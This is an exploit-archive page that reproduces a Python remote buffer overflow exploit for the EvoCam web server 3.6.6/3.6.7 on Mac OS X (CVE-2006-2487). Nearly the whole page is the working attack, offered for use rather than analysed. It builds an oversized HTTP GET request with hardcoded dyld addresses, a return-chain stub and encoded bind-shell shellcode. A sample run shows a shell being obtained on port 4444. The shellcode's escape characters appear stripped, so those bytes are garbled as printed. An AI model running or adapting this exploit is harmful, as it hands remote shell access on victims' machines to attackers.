Advertisement






Mac OS X EvoCam web servers 3.6.6 and 3.6.7 remote buffer overflow

CVE Category Price Severity
CVE-2006-2487 CWE-119 Not specified High
Author Risk Exploitation Type Date
Elazar Broad High Remote 2010-06-04
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010060011

Below is a copy:

#!/usr/bin/python

# Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and
3.6.7
# Date: 1st June 2010
# Author: d1dn0t ( didnot __A-T__ me.com )
# Software Link: http://www.pizza.org/evocam.dmg
# Version: EvoCam 3.6.6 and 3.6.7
# Tested on: OS X 10.5.8 Intel

import socket
import sys
import struct
from optparse import OptionParser

# OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Tested on Leopard 10.5.8 Intel
# Paul Harrington didnot __A-T__ me.com
#
#$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2
#EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit
#didnot __A-T__ me.com
#Targeting EvoCam Version 3.6.7
#[+] Sending evil buffer...
#[+] Done!
#[*] Check your shell at 192.168.1.28:4444
#$ nc -v 192.168.1.28 4444
#Connection to 192.168.1.28 4444 port [tcp/krb524] succeeded!
#uname -a
#Darwin Leopard-VM.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15
16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

print "EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow
Exploit"
print "didnot __A-T__ me.com"

usage =  "%prog -H TARGET_HOST -P TARGET_PORT -T Target "
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string", action="store",
dest="HOST", help="Destination Host")
parser.add_option("-P", "--target_port", type="int", action="store",
dest="PORT", help="Destination Port")
parser.add_option("-T", "--target", type="string", action="store",
dest="TARGET", help="Target Version [1=3.6.6 2=3.6.7]")
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT

if options.TARGET == "1" :
print "Targeting EvoCam Version 3.6.6"
 BUFLEN=1560
elif options.TARGET == "2" :
print "Targeting EvoCam Version 3.6.7"
 BUFLEN=1308
else:
BUFLEN=0

if not (HOST and PORT and BUFLEN):
 parser.print_help()
sys.exit()

# Settings for Leopard 10.5.8
WRITEABLE = 0x8fe66448
SETJMP = 0x8fe1cf38 #$ nm /usr/lib/dyld | grep "setjmp" #8fe1cf38 t _setjmp
STRDUP = 0x8fe210dc #$ nm /usr/lib/dyld | grep "strdup" #8fe210dc t _strdup
JMPEAX = 0x8fe01041 #0x8fe01041 <__dyld__dyld_start+49>:     jmp    *%eax

NOP="x90x90"

buf = 
"xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24" + 
"xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2" + 
"x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71" + 
"x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14" + 
"x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83" + 
"x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3" + 
"xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25" + 
"xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75" + 
"x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21" + 
"x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd" + 
"xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60" + 
"x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5" + 
"x30xd9x1ax55x01x26xf4x06x21x6bx75xac"

FRAG0 = "x90" + "x58" + "x61" + "xc3"
FRAG1 = "x90" + "x58" + "x89xe0" + "x83xc0x0e"  + "x89x44x24x08"
+ "xc3" # 0C is a bad character

STUB =  
FRAG0 + 
 struct.pack('<III',SETJMP,WRITEABLE+32,WRITEABLE) + 
FRAG1 + 
 'A'*20 +
struct.pack('<IIIII',SETJMP,WRITEABLE+24,WRITEABLE,STRDUP,JMPEAX) + 
 'A'*4

BUFFER = "A"*BUFLEN + STUB + NOP + buf

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((HOST,PORT))
print '[+] Sending evil buffer...'
s.send("GET " +BUFFER + " HTTP/1.0rnrn")
print "[+] Done!"
print "[*] Check your shell at %s:4444 " % HOST
s.close()


Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.